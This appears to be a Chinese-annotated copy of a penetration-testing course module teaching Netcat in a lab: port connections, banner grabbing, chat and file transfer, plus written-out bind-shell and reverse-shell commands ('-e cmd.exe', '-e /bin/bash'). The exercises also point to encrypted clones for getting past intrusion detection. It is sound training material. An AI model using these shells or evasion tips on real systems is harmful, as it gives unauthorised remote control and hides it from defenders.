Module 1: BackTrack Basics(第四部分 Netcat)
By:Heee
这篇主要讲NC的。基础基础~~
====
Table of Contents//目录
Netcat the Almighty
1.4.1 Connecting to a TCP/UDP Port with Netcat //用NC连接TCP/UDP端口
1.4.2 Listening on a TCP/UDP Port with Netcat//用NC监听TCP/UDP端口
1.4.3 Transferring Files with Netcat//用NC传输文件
1.4.4 Remote Administration with Netcat//用NC远程管理
1.4.5 Exercises//练习
====
Overview//概览
Netcat is a wonderfully versatile tool that has been dubbed the “hackers' Swiss army knife.” The simplest definition of Netcat is "a tool that can read and write to TCP and UDP ports." This dual functionality suggests that Netcat runs in two modes: client and server. If this sounds completely alien to you, please do some background research on this tool because we will be using it very often.
//NC被称为瑞士军刀,可见它的实用性了。
1.4.1 Connecting to a TCP/UDP Port with Netcat//用NC连接TCP/UDP端口
Connecting to a TCP/UDP port can be useful in several situations:
//在以下情况NC是非常实用的
To check if a port is open or closed//检测端口是否开放
To read a banner from the port//获取banner
To connect to a network service manually//手动连接到一个网络
Please take time to inspect Netcat's command line options:
//花些时间记住它的选项。这个大家可以百度查的,所以选项不翻译了。
root@bt:~# nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
root@bt:~#
1. To connect to TCP port 21 on 192.168.9.220 and read from it, try the following:
//连接192.168.9.220的TCP21端口
root@bt:~# nc -vn 192.168.9.220 21
(UNKNOWN) [192.168.9.220] 21 (ftp) open
220-GuildFTPd FTP Server (c) 1997-2002
220-Version 0.999.14
220-Thanks!
220 Please enter your name:
Note that port 21 is open and advertises the FTP banner 220-GuildFTPd FTP Server (c) 1997-2002. Press Ctrl+C to exit Netcat.
//21端口开放的是FTP服务,获取的banner为220-GuildFTPd FTP Server (c) 1997-2002 你可以用Ctrl+C 退出NC
2. To connect to port 80 on 192.168.9.240, send an HTTP HEAD request, and read the HTTP server banner, try the following:
//连接192.168.9.240的80端口,发送一个HTTP HEAD请求,获取banner
root@bt:~# nc -vn 192.168.9.240 80
(UNKNOWN) [192.168.9.240] 80 (www) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Sat, 17 Oct 2009 05:53:08 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 11 Oct 2008 12:44:50 GMT
ETag: "78457-b8-a1b5f480"
Accept-Ranges: bytes
Content-Length: 184
Connection: close
Content-Type: text/html; charset=UTF-8
root@bt:~#
1.4.2 Listening on a TCP/UDP Port with Netcat//用NC监听TCP/UDP端口
Listening on a TCP/UDP port using Netcat is useful for network debugging client applications or otherwise receiving a TCP/UDP network connection. Try implementing a simple chat using Netcat. Please take note of your local IP address (mine is 192.168.8.74)
//监听TCP/UDP端口,要注意的是我本机IP为192.168.8.74。我们来尝试用Netcat实现一个简单的聊天
1. To listen on port 4444 and accept incoming connections, type:
//监听本机4444端口
Computer 1 (local computer - 192.168.8.74)
root@bt:~# nc -lvp 4444
listening on [any] 4444 ...
2. From a different computer (I will be using a lab Windows machine), connect to port 4444 on your local machine:
//用其他主机通过4444端口来连接本地主机
Computer 2 (Windows box - 192.168.9.158)
C:\>nc -v 192.168.8.74 4444
192.168.8.74: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.8.74] 4444 (?) open
HI, HOW ARE YOU!
fine thanks, you?
I'M DOING GREAT!
下面是我本机的截图(IP肯定和例子不一样咯)
===
1.4.3 Transferring Files with Netcat//用NC传输文件
Netcat can also be used to transfer files, both text and binary, from one computer to another. To send a file from Computer 2 to Computer 1, try the following:
//NC同样可以用来传输文件。发送一个文件从主机2到主机1:
Computer 1: Set up Netcat to listen to and accept the connection and to redirect any input into a file.
//监听并等待一个文件的输入
root@bt:~# nc -lvp 4444 > output.txt
listening on [any] 4444 ...
Computer 2: Connect to the listening Netcat on computer 1 (port 4444) and send the file:
//连接到主机1的4444端口发送文件
C:\>echo "Hi! This is a text file!" > test.txt
C:\>type test.txt
"Hi! This is a text file!"
C:\>nc -vv 192.168.8.74 4444 < test.txt
192.168.8.74: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.8.74] 4444 (?) open
Because Netcat doesn't give any indication of file transfer progress, wait for a few seconds and then press Ctrl+C to exit Netcat.
//NC不会给任何提示表示文件传输成功,等待几秒后,可以结束它。
On Computer 1 you should see://主机1可以看到
root@bt:~# nc -lvp 4444 > output.txt
listening on [any] 4444 ...
192.168.9.158: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.8.74] from (UNKNOWN) [192.168.9.158] 1027
^C root@bt:~#
Now check that the file was transferred correctly:
//查看文件
Computer 1
root@bt:~# file output.txt
output.txt: ASCII text, with CRLF line terminators
root@bt:~# cat output.txt
"Hi! This is a text file!"
root@bt:~#
不知道你发现了没有,我在win上传送的是gif文件,但我的bt上选择接收的是txt文件。
文件传到BT上就为txt了。即使对方发送的是其他格式的文件,也只会根据本机要求的格式而修改后缀及文件名。
====
1.4.4 Remote Administration with Netcat//用NC远程管理
The other name of this chapter is “Using Netcat as a Backdoor.” There is a very specific reason for not using this title; I will point it out later in the exercise. One neat featyre of Netcat is command redirection. This means that Netcat can take an executable file and redirect the input, output, and error messages to a TCP/UDP port rather than the default console.
Take, for example, the cmd.exe executable. By redirecting the stdin, stdout, and stderr to the network, you can bind cmd.exe to a local port. Anyone connecting to this port will be presented with a command prompt belonging to this computer.
If this is confusing, just hang in there and check out the following example.
Start this example with Alice and Bob, two fictional characters trying to connect to each other'scomputers. Please take note of the network configurations; they play a critical role as you will soon see.
//一大段啊。利用NC做后门
1.4.4.1 Scenario 1: Bind Shell//场景1:绑定shell
In scenario 1, Bob has requested Alice's assistance and has asked her to connect to his computer and issue some commands remotely. As you can see, Bob has a non-RFC 1918 address and is directly connected to the internet. Alice, however, is behind a NAT'ed connection.
To complete the scenario, Bob needs to bind cmd.exe to a TCP port on his machine and inform Alice which port to connect to.
//鲍勃要求爱丽丝的援助,并要求她的连接到他的计算机执行一些命令远程。
如上图,Bob是在一个公网上,而已Alice是在NAT下的,则Bob需要绑定cmd到tcp端口上与Alice连接。
Bob's machine//bob的主机
C:\>nc -lvvp 4444 -e cmd.exe
listening on [any] 4444 ...
Anyone connecting to port 4444 on Bob's machine (hopefully Alice) will be presented with Bob's command prompt, with the same permissions that nc was run with.
//其实任何人连接到该主机的4444端口都可以使用Bob的cmd执行命令。
Alice's machine//Alice的主机
root@bt:~# ifconfig tap0
tap0 Link encap:Ethernet HWaddr a6:0c:0b:77:e8:45
inet addr:192.168.8.74 Bcast:192.168.9.255 Mask:255.255.254.0
...
root@bt:~# nc -vvn 192.168.9.158 4444
(UNKNOWN) [192.168.9.158] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter offsec:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.9.158
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . :
C:\>
这图配上这个难以理解啊。Bob为外网公网IP,直接连接到192.168.9.158?。。。
大家就别看那个图了。。把这2位作为同一NAT下,不同网段就行。。。
1.4.4.2 Scenario 2: Reverse Shell//场景2:反向链接
In scenario 2 Alice is requesting help from Bob. The assumption is that Alice does not control the NAT device she is behind. Is there any way for Bob to connect to Alice's computer and solve her problem?
Another interesting Netcat feature is the ability to send a command shell to a listening host. In this situation, although Alice cannot bind a port to cmd.exe locally to her computer and expect Bob to connect, she can send her command prompt to Bob's machine.
//不翻译了,看不看无所谓
Bob's machine
C:\>nc -lvvp 4444
listening on [any] 4444 ...
Alice's machine
root@bt:~# nc -nv 192.168.9.158 4444 -e /bin/bash
(UNKNOWN) [192.168.9.158] 4444 (?) open
Bob's machine after the connection
C:\>nc -lvvp 4444
listening on [any] 4444 ...
connect to [192.168.9.158] from (UNKNOWN) [192.168.8.74] 58630: NO_DATA
/sbin/ifconfig...
tap0 Link encap:Ethernet HWaddr a6:0c:0b:77:e8:45
inet addr:192.168.8.74 Bcast:192.168.9.255 Mask:255.255.254.0
inet6 addr: fe80::a40c:bff:fe77:e845/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6831 errors:0 dropped:0 overruns:0 frame:0
TX packets:6257 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:100
RX bytes:1003013 (1.0 MB) TX bytes:749607 (749.6 KB)
Netcat has other nice features and uses such as simple sniffing abilities, port redirection, and so forth,which I will leave for you to research independently.
//Netcat有其他不错的功能,使用如简单的嗅探能力,端口重定向,等等
The reason I didn't want to call this module “Netcat as a backdoor” is that students usually startthinking about the malicious implementations of such a backdoor, and one of the first questions asked is, “How do I get Netcat to run on the victim machine, without remote user intervention?” I usually dismiss this question, with a horrified look on my face.
The magic answer to this question can be embodied in three words: remote code execution. In this example, both Bob and Alice are willing participants in the exercise. To escalate this demonstration to a "hack," we would need Netcat to execute itself without the involvement of the user on the other side.
Ninety percent of attack vectors can be boiled down to the words remote code execution. For example, attacks such as buffer overflows, SQL injection, file inclusion, client side attacks, and trojan horses all aim to result in remote code execution on the victim machine.
//nc不是一个攻击的软件,他可以作为一个后门。而不是怎样才能让对方执行NC,我们提交的是恶意代码,我们常用的攻击方式很多如缓冲区溢出、SQL注入、文件包含、客户端攻、,特洛伊木马都旨在导致远程代码执行。
1.4.5 Exercises//练习
1. Connect to the Windows XP client machine assigned to you via Remote Desktop. (You will find Netcat in the Extras directory on the desktop.) Do not forget to disable the Windows XP firewall,or alternatively open a specific port in the firewall for Netcat connections (TCP 4444 is fine).
//尝试连接远程主机。
2. Use Netcat to implement the following scenarios between two networked computers: //利用NC实现下列场景
Simple chat //聊天
File transfer//文件传输
Bind/reverse shell//正/反向 连接
Port scanner //端口扫描
Banner grabber//banner获取
Experiment with connections from Windows and Linux machines//win与Linux主机相连接
3. Most IPS/IDS systems identify the traffic signature of a flying shell and flag it as evil. Several encrypted Netcat clones exist, which have turned into my permanent Netcat replacements. Take time to get to know SBD (Google: sbd netcat clone). Implement the bind/reverse shell scenarios using SBD under Linux
//IPS/IDS能够辨认出它是不安全的,请尝试加密修改它。去认识sbd nc clone。